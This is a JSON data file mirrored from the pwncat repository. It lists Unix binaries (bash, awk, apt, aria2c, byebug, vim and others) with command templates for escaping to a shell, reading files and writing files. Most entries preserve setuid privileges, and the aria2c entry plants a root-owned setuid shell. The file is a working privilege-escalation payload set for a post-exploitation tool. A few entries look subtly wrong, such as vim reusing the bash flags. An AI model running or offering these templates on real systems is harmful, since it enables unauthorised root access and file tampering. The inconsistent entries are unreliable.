mirror of
https://github.com/calebstewart/pwncat.git
synced 2024-11-27 19:04:15 +01:00
157 lines
3.4 KiB
JSON
157 lines
3.4 KiB
JSON
[
|
|
{
|
|
"name": "cat",
|
|
"read_file": "{path} {lfile}"
|
|
},
|
|
{
|
|
"name": "cp",
|
|
"write_file": {
|
|
"type": "base64",
|
|
"payload": "TF=/tmp/.pwncat; echo {data} | {base64} -d > $TF; {path} $TF ${lfile}; {unlink} $TF"
|
|
}
|
|
},
|
|
{
|
|
"name": "bash",
|
|
"shell": {
|
|
"script": "{command}",
|
|
"suid": ["-p"]
|
|
},
|
|
"read_file": "{path} -p -c \"{cat} {lfile}\"",
|
|
"write_file": {
|
|
"type": "base64",
|
|
"payload": "{path} -p -c \"echo -n {data} | {base64} -d > {lfile}\""
|
|
},
|
|
"command": "{path} -p -c {command}"
|
|
},
|
|
{
|
|
"name": "apt-get",
|
|
"shell": {
|
|
"need": ["changelog", "apt"],
|
|
"input": "!{shell}\n",
|
|
"exit": "exit\nq\n"
|
|
}
|
|
},
|
|
{
|
|
"name": "apt",
|
|
"shell": {
|
|
"need": ["changelog", "apt"],
|
|
"input": "!{shell}\n",
|
|
"exit": "exit\nq\n"
|
|
}
|
|
},
|
|
{
|
|
"name": "aria2c",
|
|
"shell": {
|
|
"script": "TF=$(mktemp); SHELL=$(mktemp); cp {shell} $SHELL; echo \"{chown} root:root $SHELL; {chmod} +sx $SHELL;\" > $TF;{chmod} +x $TF; {command}; sleep 1; $SHELL -p",
|
|
"need": ["--on-download-error=$TF","http://x"]
|
|
}
|
|
},
|
|
{
|
|
"name": "ash",
|
|
"shell": {
|
|
"script": "{command}",
|
|
"suid": ["-p"]
|
|
},
|
|
"read_file": "{path} -p -c \"cat {lfile}\"",
|
|
"write_file": {
|
|
"type": "base64",
|
|
"payload": "{path} -p -c \"echo -n {data} | {base64} -d > {lfile}\""
|
|
},
|
|
"command": "{path} -p -c {command}"
|
|
},
|
|
{
|
|
"name": "awk",
|
|
"shell": {
|
|
"script": "{command} 'BEGIN {{system(\"{shell} -p\")}}'"
|
|
},
|
|
"read_file": "{path} '//' {lfile}",
|
|
"write_file": {
|
|
"type": "base64",
|
|
"payload": "{path} -v LFILE={lfile} 'BEGIN {{ printf \"\" > LFILE; while ((\"echo \\\"{data}\\\" | base64 -d\" | getline) > 0){{ print >> LFILE }} }}'"
|
|
}
|
|
},
|
|
{
|
|
"name": "gawk",
|
|
"shell": {
|
|
"script": "{command} 'BEGIN {{system(\"{shell}\")}}'"
|
|
},
|
|
"read_file": "{path} '//' {lfile}",
|
|
"write_file": {
|
|
"type": "base64",
|
|
"payload": "{path} -v LFILE={lfile} 'BEGIN {{ printf \"\" > LFILE; while ((\"echo \\\"{data}\\\" | {base64} -d\" | getline) > 0){{ print >> LFILE }} }}'"
|
|
}
|
|
},
|
|
{
|
|
"name": "base32",
|
|
"read_file": "{path} {lfile} | {path} -d"
|
|
},
|
|
{
|
|
"name": "base64",
|
|
"read_file": "{path} {lfile} | {path} -d"
|
|
},
|
|
{
|
|
"name": "bpftrace",
|
|
"shell": {
|
|
"script": "{command} -c {shell} -e 'END {{exit()}}'",
|
|
"suid": ["-p"]
|
|
}
|
|
},
|
|
{
|
|
"name": "bundler",
|
|
"shell": {
|
|
"script": "{command} help",
|
|
"input": "!{shell}\n",
|
|
"exit": "exit\nq\n"
|
|
}
|
|
},
|
|
{
|
|
"name": "busctl",
|
|
"shell": {
|
|
"script": "{command}",
|
|
"input": "!{shell}\n",
|
|
"exit": "exit\nq\n"
|
|
}
|
|
},
|
|
{
|
|
"name": "byebug",
|
|
"shell": {
|
|
"script": "TF=$(mktemp);echo 'system(\"{shell}\")' > $TF;{command} --no-stop -q $TF",
|
|
"need": [
|
|
"--no-stop",
|
|
"-q"
|
|
]
|
|
},
|
|
"read_file": "TF=$(mktemp);echo 'system(\"{cat} {lfile}\")' > $TF;{command} --no-stop -q $TF",
|
|
"write_file": {
|
|
"type": "base64",
|
|
"payload": "TF=$(mktemp);echo 'system(\"echo {data} | {base64} -d > {lfile}\")' > $TF;{path} --no-stop -q $TF"
|
|
}
|
|
},
|
|
{
|
|
"name": "dash",
|
|
"shell": {
|
|
"script": "{command}",
|
|
"suid": ["-p"]
|
|
},
|
|
"read_file": "{path} -p -c \"{cat} {lfile}\"",
|
|
"write_file": {
|
|
"type": "base64",
|
|
"payload": "{path} -p -c \"echo -n {data} | {base64} -d > {lfile}\""
|
|
},
|
|
"command": "{path} -p -c {command}"
|
|
},
|
|
{
|
|
"name": "vim",
|
|
"shell": {
|
|
"script": "{command}",
|
|
"suid": ["-p"]
|
|
},
|
|
"read_file": "{path} -p -c \"cat {lfile}\"",
|
|
"write_file": {
|
|
"type": "base64",
|
|
"payload": "{path} -p -c \"echo -n {data} | base64 -d > {lfile}\""
|
|
},
|
|
"command": "{path} -p -c {command}"
|
|
}
|
|
]
|